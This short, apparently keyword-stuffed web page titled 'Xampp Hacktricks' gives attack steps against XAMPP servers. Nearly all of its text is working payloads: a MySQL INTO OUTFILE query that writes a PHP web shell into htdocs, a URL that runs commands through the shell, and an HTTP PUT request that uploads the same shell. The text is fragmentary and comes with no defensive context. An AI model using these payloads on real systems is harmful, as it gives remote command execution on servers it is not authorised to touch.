Skip to content
English
  • There are no suggestions because the search field is empty.

Xampp Hacktricks | HD 2024 |

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:/xampp/htdocs/shell.php" Then access: http://target/shell.php?cmd=whoami If enabled (common on older XAMPP):

PUT /test.txt HTTP/1.1 Content-Type: text/plain <?php system($_GET['cmd']); ?> xampp hacktricks